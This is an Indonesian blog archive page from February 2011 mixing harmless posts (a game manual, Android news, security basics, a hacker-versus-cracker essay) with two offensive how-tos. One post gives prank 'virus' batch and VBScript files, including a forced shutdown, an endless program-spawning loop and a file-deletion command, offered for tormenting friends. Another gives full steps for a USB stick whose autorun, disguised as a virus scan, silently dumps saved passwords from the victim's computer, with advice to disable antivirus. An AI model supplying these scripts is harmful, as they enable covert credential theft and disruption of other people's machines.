. Teknologi Informasi™: Februari 2011
======================================= WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME ============================================================================== WELCOME =======================================
Google Google arif-novendi.blogspot.com

Kamis, 24 Februari 2011

Manual Book Elite Sniper

Tulisan ini di buat untuk menyelesaikan tugas mata kuliah softskill yaitu membuat suatu manual book atau cara penggunakan suatu permainan.Permainan ini di dapat dari situs game online yaitu "www.belugerin.com"

Pertama kita masuk belugerin.com kemudian pilih Free Online Games.Dari situ kita langsung dihubungkan ke situs gamenya.Terdapat berbagai jenis games.Diantaranya adalah arcade,puzzle,sport dan lain sebagainya.Disini saya memilih game arcade yaitu Elite Sniper.
Maka kita langsung klik saja gambar elite sniper dan Play.Selanjutnya kita tunggu untuk buffer game,disini loadingnya cukup lama karena gamenya memiliki grafik yang lumayan bagus sehingga ukurannya pun agak besar.
Setelah selesai buffer selanjutnya kita pilih Play maka otomatis kita langsung masuk ke game itu dan akan muncul tampilan seperti dibawah ini :



Setelah masuk disini kita sebagai seorang polisi yang bertugas untuk membasmi semua musuh yang ada di depan kita.Musuh dapat berada di tempat-tempat yang tidak terduga sehingga kita harus mencari dan menembaknya.Dalam menembaknya pun kita harus cepat dan tepat sasaran karena apabila kita tidak cepat maka kita akan di tembak duluan oleh lawan.Untuk menembak kita gunakan tombol klik kanan pada mouse dan untuk ke atas,kanan,kiri,bawah kita hanya gerakan mouse saja.
Dibawah ini merupakan tampilan ketika sedang menembak musuh :



Ketika semua musuh sudah dibasmi maka kita akan masuk ke level berikutnya.Dilever selanjutnya kita akan mendapatkan map atau tempat yang berbeda dari level sebelumnya.Dapat dilihat seperti gambar di bawah ini :



Dalam permainan ini tidak semua karakter yang ada didepan kita adalah lawan.Maksudnya adalah kita tidak boleh langsung menembak orang sembarangan.Karena didalamnya ada masyarakat biasa yang tidak boleh kita tembak.
Seperti contoh gambar dibawah ini :



Apabila masih di langgar juga dan kita menembak orang yang ternyata bukan lawan kita,maka kita akan mendapat peringatan seperti dapat dilihat pada gambar di bawah ini :



Read More..

Sabtu, 19 Februari 2011

Keamanan Komputer

keamanan komputer adalah Suatu usaha pencegahan dan pendeteksian penggunaan komputer secara tidak sah atau tidak diizinkan dan usaha melindungi aset dan menjaga privacy dari para cracker yang menyerang

Ada empat aspek utama dalam keamanan komputer.
1 Privacy/Confidentiality yaitu usaha menjaga informasi dari orang yang tidak berhak mengakses (mengaransi bahwa data pribadi tetap pribadi).
2 Integrity yaitu usaha untuk menjaga data atau sistem tidak diubah oleh yang tidak berhak.
3 Authentication yaitu usaha atau metoda untuk mengetahui keaslian dari informasi, misalnya apakah informasi yang dikirim dibuka oleh orang yang benar (asli) atau layanan dari server yang diberikan benar berasal dari server yang dimaksud.
4 Availability berhubungan dengan ketersediaan sistem dan data (informasi) ketika dibutuhkan.

Bidang Keamanan Komputer secara terus menerus mengalami perkembangan luar biasa sebab teknologi informasi memiliki pengaruh yang semakin tinggi terhadap bagaimana kita bekerja, berkomunikasi, berbelanja dan menikmati hiburan. Program online dalam Keamanan Komputer meliputi dua bidang spesialisasi utama:
Pertama, keamanan jaringan yang meliputi perlindungan jaringan IT dari para hacker , kehilangan data, pencurian identitas, virus dan jenis serangan malware lainnya. Program online yang mempersiapkan pesertanya untuk mendalami ini secara khusus mencakup pelajaran dalam bidang keamanan jaringan, cryptology (baca: ahli membaca kode), sistem operasi dan strategi pemakaian firewall . Alumninya dapat diterima dalam posisi, seperti Spesialis Keamanan Jaringan, Analis Keamanan Teknologi Informasi dan Spesialis Firewall. Tanggung jawabnya bisa meliputi monitoring, evaluasi dan pemeliharaan akun log-on dan password pengguna jaringan, mengidentifikasi dan menangani ancaman, pelanggaran keamanan yang mungkin terjadi, serta menerapkan kebijakan keamanan komputer sebuah organisasi.
Kedua, forensik komputer yang meliputi investigasi terhadap kejahatan internet, seperti pencurian identitas, penyalahgunaan hak milik orang lain, pornografi anak-anak di bawah umur dan pengintaian lewat internet. Pesertanya mempelajari secara khusus dan mendalam masalah proses penemuan, pengumpulan dan analisis bukti-bukti digital dari berbagai sumber seperti hard drive komputer dan email, dan penyiapan bukti-bukti untuk melakukan penuntutan kejahatan komputer. Mata pelajarannya yang unik meliputi penggunaan alat-alat keamanan teknologi informasi dan latihan merencanakan, mendeteksi, merespon dan menyehatkan kembali segala kerusakan yang memerlukan bantuan forensik jaringan. Disamping peluang dalam sektor publik, banyak perusahaan sekarang merekrut tenaga ahli guna memonitor dan menginvestigasi pelanggaran karyawan yang terkait dengan komputer untuk melindungi perusahaan dari kerentanan, serta menyelamatkan rahasia perdagangan. Peluang kerjanya meliputi berbagai posisi, misalnya Spesialis Forensik Komputer, Analis Jaringan Keamanan, Investigator IT dan Analis Ancaman Spionase pihak lawan. Silahkan menelusuri program-program pendidikan dalam bidang Keamanan Komputer dari berbagai perguruan tinggi dan universitas, dan mintalah informasi lebih banyak sekarang juga. Semua program dirancang untuk memberikan orang-orang dewasa yang telah bekerja peluang untuk memiliki keleluasaan waktu dan persiapan sungguh-sungguh dan matang untuk memasuki atau maju dalam profesi yang bertumbuh sangat cepat dan menyenangkan ini.

Read More..

Minggu, 13 Februari 2011

Virus Pada Android


Smartphone berbasis sistem operasi Android dewasa ini semakin populer. Namun, tidak berarti ponsel pintar itu aman dari ancaman virus. Baru-baru ini sebuah virus trojan di OS Android berhasil dideteksi oleh sebuah perusahaan keamanan mobile, LookOut Mobile Security.

Virus trojan ini diketahui dapat memanfaatkan smartphone Android layaknya perangkat botnet. Artinya, peretas dapat menginstruksikan perangkat yang terinfeksi tersebut untuk berbuat sesuai keinginannya, seperti mengirim e-mail, spam, termasuk menyebarkan virus ke teman-temannya.

Virus itu dinamakan 'Geinimi' berdasarkan inkarnasi pertama yang diketahui. "Trojan ini dapat mencuri sejumlah besar data pribadi pengguna dan mengirimkannya ke beberapa remote server," kata LookOut Mobile Security dalam keterangannya, yang dikutip VIVAnews dari Cellular News, Jumat 31 Desember 2010.

"Sekali malware itu terinstal pada ponsel pengguna, maka ponsel itu sangat dimungkinkan untuk menerima perintah dari server meski jaraknya sangat jauh. Dengan begini, peretas dapat mengontrol sejumlah besar ponsel sesuai keinginannya melalui server," paparnya.

Menurut LookOut, ketika sebuah aplikasi host mengandung Geinimi diluncurkan pada ponsel pengguna, trojan akan bekerja dan mengumumpulkan informasi penting dan bersifat privasi. Informasi khusus yang dikoleksi mencakup lokasi koordinat pengguna, mengenali nomor unik perangkat (IMEI) dan kartu SIM (IMSI).

Dalam waktu lima menit, Geinimi dapat terhubung dengan server remote dengan menggunakan satu dari 10 domain yang tersedia. Kabar baiknya, trojan tersebut kebetulan hanya didistribusikan melalui kios aplikasi pihak ketiga atau buatan China, bukan di kios aplikasi Android resmi.

Read More..

Keuntungan dan Kelemahan Android

Android adalah sistem operasi untuk telepon seluler yang berbasis Linux. Android menyediakan platform terbuka bagi para pengembang buat menciptakan aplikasi mereka sendiri untuk digunakan oleh bermacam peranti bergerak. Awalnya, Google Inc. membeli Android Inc., pendatang baru yang membuat peranti lunak untuk ponsel. Kemudian untuk mengembangkan Android, dibentuklah Open Handset Alliance, konsorsium dari 34 perusahaan peranti keras, peranti lunak, dan telekomunikasi, termasuk Google, HTC, Intel, Motorola, Qualcomm, T-Mobile, dan Nvidia.

Jika Anda mempunyai keinginan untuk membeli ponsel dengan system operasi Android, tetapi belum tahu apa kekurangan dan kelebihannya, berikut ini adalah beberapa kelebihan dan kekurangan ponsel OS Android.

Kelebihan

• Multitasking
–Ponsel Android bisa menjalankan berbagai macam aplikasi, itu artinya Anda bisa browsing, Facebookan sambil dengerin lagu.

• Kemudahan dalam Notifikasi
– Setiap ada SMS, Email, atau bahkan artikel terbaru dari RSS Reader, akan selalu ada notifikasi di Home Screen Ponsel Android, tidak ketinggalan pula Lampu LED Indikator yang berkedip-kedip, sehingga Anda tidak akan terlewatkan satu SMS, Email ataupun Misscall sekalipun.

• Akses Mudah terhadap Ribuan Aplikasi Android lewat Google Android App Market
– Kalau Anda hobi install aplikasi ataupun games, lewat Google Android App Market, Anda bisa mendownload berbagai aplikasi dengan gratis. Ada banyak ribuan aplikasi dan games yang bisa Anda download di ponsel Android.

• Pilihan Ponsel yang beranekaragam
- Bicara ponsel Android,tentu akan teras abeda dibandingkan denagn iOS.jika iOs hanya terbatas pada iPhone dariapple, tetapi ponsel Android tersediadari berbagai produsen, seperti Sony Ericsson, Motorola, HTC, bahkan sampai Samsung. Dan pastinya dari setiap pabrikan ponsel pun menghadirkan ponsel Android dengan gaya masing-masing, seperti Motorola dengan Motoblur-nya, Sony Ericsson dengan TimeScape-nya. Jadi Anda bisa leluasa memilih ponsel Android sesuai dengan ‘merk’ favorite.

• Bisa menginstal ROM yang dimodifikasi
– jika Anda tidak puas dengan tampilan standar Android, jangan khawatir ada banyak Costum ROM yang bisa Anda pakai di ponsel Android.

• Widget
–dengan adanya Widget di homescreen, Anda bisa dengan mudah mengakses berbagai setting dengan cepat dan mudah.

• Google Maniak
– Jika Anda pengguna setia layanan Google mulai dari Gmail sampai Google Reader, ponsel Android telah terintegrasi dengan layanan Google, sehingga Anda bisa dengan cepat mengecek email dari gMail.

Kekurangan

Dalam segala hal pasti kita tidak akan terlepas dari hal yang berkebalikan. Begitu juga dengan ponsel android ini, jika ada kelebihan pasti juga ada kekurangannya.

• Koneksi Internet yang terus menerus –kebanyakan ponsel Android memerlukan koneksi internet yang simultan alias terus menerus aktif. Artinya Anda harus siap berlangganan paket GPRS yang sesuai dengan kebutuhan.

• Iklan – Aplikasi di Ponsel Android memang bisa didapatkan dengan mudah dan gratis, namun Anda harus terima konsekuensinya dari setiap Aplikasi tersebut, akan selalu ada Iklan yang terpampang, entah itu bagian atas atau bawah aplikasi.

Read More..

Alasan OS Android Kuasai Dunia

Sistem operasi Android baru saja menjungkalkan Symbian, sebagai OS mobile terpopuler di dunia. Ini adalah tonggak yang penting bagi Google dan memberikan sinyal bahwa Android memang akan mendominasi ranah ponsel sejagat.

Kira-kira, apa sebabnya Android bisa melesat dan menguasai pasar smartphone dengan cepat? Berikut ada delapan alasannya, seperti dikutip detikINET dari eWeek, Kamis (3/2/2011):

1. Setiap Versi Bertambah Baik

Dengan upgrade rutin yang dilakukan, setiap versi Android dijamin semakin baik performa maupun fiturnya. Versi terbaru yakni Android 3.0 atau Honeycomb menjanjikan penambahan kualitas yang signifikan.

2. Smartphone Android Memang Bagus

Kesuksesan Android tidak lepas dari smartphone pengusung OS ini, yang memiliki bermacam fitur bagus. Sebut saja Droid X, Galaxy S sampai HTC Evo memiliki banyak kelebihan sehingga konsumen tertarik membelinya.

3. Membiarkan RIM Terlena

Pada awalnya, Google seakan terkesan membiarkan BlackBerry dari RIM menguasai pasar enterprise. Penjualan Android lebih terfokus pada konsumen umum. Namun setelah sukses di pasar consumer, kini Android mulai membidik pebisnis dan makin banyak kalangan korporat memakai Android ketimbang BlackBerry.

4. Dengan Sedikit Model, Apple Tidak Dapat Melawan Android

Dengan hanya memasarkan iPhone 3GS dan iPhone 4, Apple semakin kelabakan melawan Android. Lusinan smartphone Android bukanlah lawan yang sebanding meski iPhone sebenarnya masih sangat laris.

5. Penurunan Pangsa Pasar Microsoft

Peruntungan Microsoft di ranah OS mobile kurang baik belakangan ini. Peluncuran Windows Phone 7 dinilai terlambat dan pangsa pasar mereka menurun. Hal ini memberi celah bagi Android meraih semakin banyak kue pasar smartphone.

6. Nokia Sempoyongan

Dari yang semula sangat dominan menguasai arena smartphone, Nokia kini mulai sempoyongan. Salah satu alasannya, OS Symbian yang kukuh mereka pakai dianggap ketinggalan zaman dibandingkan Android. Jadilah konsumen mulai banyak melirik OS robot hijau.

7. Dukungan Vendor Kelas Atas

Dukungan penuh vendor kelas atas amat membantu melonjakkan popularitas Android. Bahkan mungkin tanpa dukungan nama-nama seperti Samsung, Motorola dan HTC yang menyajikan ponsel berkelas, Android tidak bakal sesukses sekarang.

8. Keampuhan Merek Google

Reputasi merek Google yang hebat membuat para konsumen tidak meragukan Android. Mereka sepertinya memercayai Android akan memberikan sebuah pengalaman memakai smartphone yang bisa mereka nikmati.

Read More..

Sabtu, 12 Februari 2011

Cara mengatasi login failed (#0001) pada Zynga Poker

Langsung saja ya,mungkin tulisan ini agak aneh yaitu tentang error yang terjadi pada zynga poker yaitu dengan keterangan “login failed(#0001)".Kejadian seperti ini juga pernah menimpa saya dimana saya tidak tau sebab musababnya.Nah pas diselidiki oleh tim investigasi(hhe..) ternyata error seperti ini terjadi karena koneksi pada internet kita yang kurang bagus,bisa dibilang lemot. :p.Bisa terjadi gangguan oleh cuaca maupun koneksi dari kartu perdana jika kalian menggunakan modem.Hal ini menyebabkan dari zynga akan mengira kalau kita akan melakukan kecurangan,sehingga akun kita seolah-olah kena scorsing..BeHahaha...
Mungkin error (#0001) ini bisa di lihat seperti pada gambar di bawah ini :



Bagaimana cara mengatasinya??
Ternyata cara mengatasi masalah ini tidaklah serumit yang kalian pikirkan.Yaitu caranya selama 24jam anda harus tidak online facebook terlebih dahulu.Jangan buka tu zynga poker sebelum 24jam dari terakhir terjadi error pas anda buka.Misalnya gini,anda buka terakhir zynga pukul 18.00 (6 malem-hari kamis) pada saat itu masih terjadi error,.jadi anda harus buka lagi zynga 19.00 (7 malem-hari jum’at).Nah kira-kira begitu..Cobain aja deh..Semoga bermanfaat

Read More..

Jumat, 11 Februari 2011

Perbedaan Hacker dan Cracker dan Akibatnya

Pada postingan yang lalu saya telah mengulas sedikit tentang pengertian hacker dan cracker dengan sedikit perbedaan pada ruang lingkup kegiatannya, maka postingan kali ini akan saya beri penjesan lebih jauh tentang perbedaan keduanya.

Hacker
1.Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji situs Yahoo! dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna.
2.Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.
3. Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.

Sedangkan seorang Cracker, dia mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan.
Sebagia contoh : Virus, Pencurian Kartu Kredit, Kode Warez, Pembobolan Rekening Bank, Pencurian Password E-mail/Web Server. Bisa berdiri sendiri atau berkelompok dalam bertindak. Mempunyai situs atau cenel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang bisa mengaksesnya. Mempunyai IP yang tidak bisa dilacak. Kasus yang paling sering ialah Carding yaitu Pencurian Kartu Kredit, kemudian pembobolan situs dan mengubah segala isinya menjadi berantakan. Sebagai contoh : Yahoo! pernah mengalami kejadian seperti ini sehingga tidak bisa diakses dalam waktu yang lama, kasus clickBCA.com yang paling hangat dibicarakan tahun 2001 lalu.

Akibat yang Ditimbulkan oleh Hacker dan Cracker

• Hacker : membuat teknologi internet semakin maju karena hacker menggunakan keahliannya dalam hal komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sebuah sistem komputer ataupun dalam sebuah software, membuat gairah bekerja seorang administrator kembali hidup karena hacker membantu administrator untuk memperkuat jaringan mereka.
• Cracker : merusak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rusak, hilang, ataupun berubah.

Read More..

Rabu, 09 Februari 2011

Hacker Dari Indonesia

1. Dani Firmansyah A.K.A Xnuxer


Xnuxer(di dunia maya), nama panggilan Dani Firmansyah di dunia bawah tanah, di tangkap Satuan Cyber Crime Direktorat Reserse Khusus Kepolisian Daerah Metro Jaya pada tanggal 24 April 2004 sekitar pukul 17:20 di Jakarta.
Jumat 16 April, Xnuxer mencoba melakukan tes sistem sekuriti kpu.go.id melalui XSS (cross site scripting) dari IP 202.158.10.117, namun dilayar keluar message risk dengan level low (website KPU belum tembus atau rusak).
Sabtu 17 April 2004 pukul 03.12,42, Xnuxer mencoba lagi melakukan penetrasi ke server tnp.kpu.go.id dengan cara SQL Injection dan berhasil menembus IP tnp.kpu.go.id 203.130.201.134, serta berhasil meng-up date daftar nama partai pada pukul 11.23,16 sampai pukul 11.34,27. Teknik yang dipakai Xnuxer dalam meng-hack yakni melalui teknik spoofing (penyesatan). Xnuxer melakukan serangan dari IP 202.158.10.117, kemudian membuka IP Proxy Anonymous Thailand 208.147.1.1 sebelum msuk ke IP tnp.kpu.go.id 203.130.201.134, dan berhasil membuka tampilan nama 24 partai politik peserta pemilu.

Beruntung Xnuxer meng-hack situs KPU hanya karena ingin mengetes keamanan sistem keamanan server tnp.kpu.go.id, tanpa ada muatan politik. Di tambah, sifat Xnuxer yang sangat cooperatif, akhirnya Xnuxer hanya di bui beberapa bulan saja.


2. Onno W. Purbo A.K.A Kang Onno


Onno Widodo Purbo (lahir di Bandung 17 Agustus 1962; umur 45 tahun) adalah seorang tokoh (yang kemudian lebih dikenal sebagai pakar di bidang) teknologi informasi asal Indonesia. Ia memulai pendidikan akademis di ITB pada jurusan Teknik Elektro pada tahun 1981. Enam tahun kemudian ia lulus dengan predikat wisudawan terbaik, kemudian melanjutkan studi ke Kanada dengan beasiswa dari PAU-ME.
RT/RW-Net adalah salah satu dari sekian banyak gagasan yang dilontarkan. Ia juga aktif menulis dalam bidang teknologi informasi media, seminar, konferensi nasional maupun internasional. Percaya filosofy copyleft, banyak tulisannya dipublikasi secara gratis di internet.
Pejuang kemerdekaan frekuensi 2.4 GHz, VOIP-Rakyat, dan Antena Wifi dari kaleng.

3. I Made Wiryana A.K.A Pak Made

Cyber Paspampres nih, konon website dan server President SBY beliau yang pegang untuk maintenance dan keamanannya… (pernah digempur ampe DDos, namun dalam waktu itungan detik back-up server –ga tau dah back-up yang nomor berapa– langsung up).
Beliau juga pelopor perkembangan linux di indonesia bersama pak Rusmanto (redaktur Info Linux). menyelesaikan pendidikan di dua institusi pendidikan yaitu S1-Fisika Universitas Indonesia pada tahun 1991 dan S1-manajemen Informatika STIMIK Gunadarma tahun 1992 dan melanjutkan Magister di eidith cowan university Australia dan sejak tahun 2004 sampai sekarang sedang menyelesaikan program Doktoral di RVS Bielfield Jerman. Status pekerjaannya adalah Dosen Tetap universitas Gunadarma.

Read More..

Selasa, 08 Februari 2011

Bikin Virus Dengan Notepad

Bikin Virus Sesuka kamu :)

Waktu lg browsing, ketemu nih keren nih
copy paste code-code yang ada di bawah ini ke dalam NOTEPAD( Total ada 9 VIRUS yg bisa dibikin)
1.message yang nongol melulu

Code:
@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cupu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT
(ekstensi filenya harus .BAT)
2.bikin shutdown+message
Code:
[i]@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”
save namafile.BAT
[/i](ekstensi filenya harus .BAT)
3.Mainin Caps Lock button
Code:
[i]Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
save namafile.vbs[/i]
(save dengan Ekstensi file .vbs)
4.buka tutup CD/DVD
[i]Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs[/i]
5.bikin vbscript nongol mlulu
Code:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
save namafile.vbs
ket:di task manager full wscript yg lg running
[/i]
6.teken tombol backspace mlulu
Code:
[i]MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
save namafile.vbs
[/i]7.otomatis ngetik “lu jelek banget sih” di notepad/word
Code:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop
save namafile.vbs
8.buka notepad trus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.
[/i]
9.otomatis buka notepad lalu ngetik apa yg lo mau
Code:
[i]WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
save namafile.vbs
ket:
ini salah satu script favorit gw…
[/i][i]10.@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top[/i]
ket di atas :
kalo pilih 1.otomatis matiin computer
2.format file (terserah file apaan ganti aj dir nya)
3.sama aj kayak pilihan 1
kata2 di atas di ganti2 aj sesuai selera temen2
NB : gunakan script ini untuk menjahili teman anda
just fun only ok^^

Read More..

Membobol Password Facebook Menggunakan Flashdisk

Ada sejumlah tools yang berfungsi merecovery (memulihkan) password dari file tempatnya di simpan dengan memanfaatkan USB flashdisk. Anda dapat membuat rootkit Anda sendiri untuk meng-hack password. berikut ini sejumlah tools untuk Menjadikan flashdisk menjadi alat hack password :

MessenPass : piranti recover password yang paling populer untuk Program Instant Messenger seperti: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger, Trillian, Miranda, dan Gaim.

Mail PassView : merecovery password dari program email seperti: Outlook Express, Microsoft Outlook 2000 (POP3 dan SMTP Account saja), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP dan SMTP Account), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird dan Group Mail Gratis lainnya.

IE Passview : adalah utilitas sederhana yang bisa merecovery password dari browser Internet Explorer. Versi ini mendukung Internet Explorer 7.0, serta versi Internet explorer, v4.0 – v6.0.

Protected Storage PassView : merecovery semua password yang tersimpan dalam Protected Storage, termasuk AutoComplete password Internet Explorer, password dari situs yang dilindungi sandi, MSN Explorer Sandi, dan masih banyak lagi …

PasswordFox : PasswordFox adalah utilitas pemulihan password sederhana yang memungkinkan anda melihat nama pengguna dan sandi yang disimpan oleh browser Mozilla Firefox. Secara default, PasswordFox menampilkan password yang disimpan dalam profil aktif Anda, tetapi Anda dapat dengan mudah memilih untuk melihat password Firefox di lain profil.

Berikut adalah langkah demi langkah untuk menciptakan procedure password hacking toolkit dalam USB Drive (Flashdisk):
CATATAN: Anda harus menonaktifkan sementara antivirus Anda sebelum mengikuti langkah-langkah ini.
1. Download dan ekstrak ke 5 tools di atas dan copy file executable (Exe file) saja ke Flashdisk yaitu: Salinlah file – mspass.exe, mailpv.exe, iepv.exe, pspv.exe dan passwordfox.exe ke dalam USB Drive.
2. Buat file Notepad baru dan dan ketik teks berikut ini :
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
3. Simpan Notepad and rename dari New Text Document.txt menjadi autorun.inf, lalu
copy file autorun.inf ke dalam USB drive.
4. Buat file Notepad baru lagi dan ketik teks berikut :
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
5. Simpan file Notepad and gantilah namanya dari New Text Document.txt menjadi launch.bat, lalu Salin file launch.bat USB drive Anda.
Sekarang rootkit Anda sudah siap di gunakan untuk hack password. Namun, tools Hack ini akan bekerja pada Windows 2000, XP, Vista dan 7 serta akan memulihkan password jika ada password yang tersimpan dalam computer.
Cara menggunakan flashdisk hack tools sebagai berikut :
1. Masukkan flashdisk ke USB Port dan jendela pop-up autorun akan tampil. (Hal ini karena, ada telah menciptakan sebuah autorun di flashdisk).
2. Pada jendela pop-up, pilih pilihan pertama (melakukan scan Virus).
3. Sekarang, semua hacking tools password berjalan secara diam-diam di belakang layar. Proses ini memakan waktu tidak terlalu lama. Password yang di temukan akan di recover untuk selanjutnya disimpan dalam sebuah file TXT.
4. Keluarkan flashdisk dan Anda akan melihat password yang tersimpan dalam format TXT file.Ü

Read More..

Cara Agar Terhindar Dari Serangan Hacker

Tips-tips agar kita terhindar dari ulah para hacker !!


1. Jangan pernah mengumbar alamat email secara berlebihan. Khususnya dengan orang-orang yang belum kita kenal.

2. Sembunyikan alamat email yang berada di kotak informasi facebook anda.

3. Jangan mudah percaya dengan orang-orang yang baru anda kenal.

4. Kalau anda online di warnet, jangan lupa bersihkan cookies anda !

5. Berhati-hatilah ketika kita dikasih suatu link yang tujuannya belum kita ketahui dan jangan langsung klik link tersebut.

6. Selalu bersikap baik dengan teman-teman facebook yang kita punyai. Karena kebanyakan yang nge-hack facebook itu teman facebook kita sendiri.
kejahatan bukan hanya terjadi karena ada niat pelakunya, tapi juga karna ada kesempatan...waspadalah....waspadalah....hhe

Semoga tulisan saya ini Bermanfaat.

Read More..

Mengenal Teknik-Teknik Hacking

Teknik - teknik dibawah ini yang paling banyak digunakan oleh seorang Hacker :

1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang. Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.

3. Unix Finger Exploits

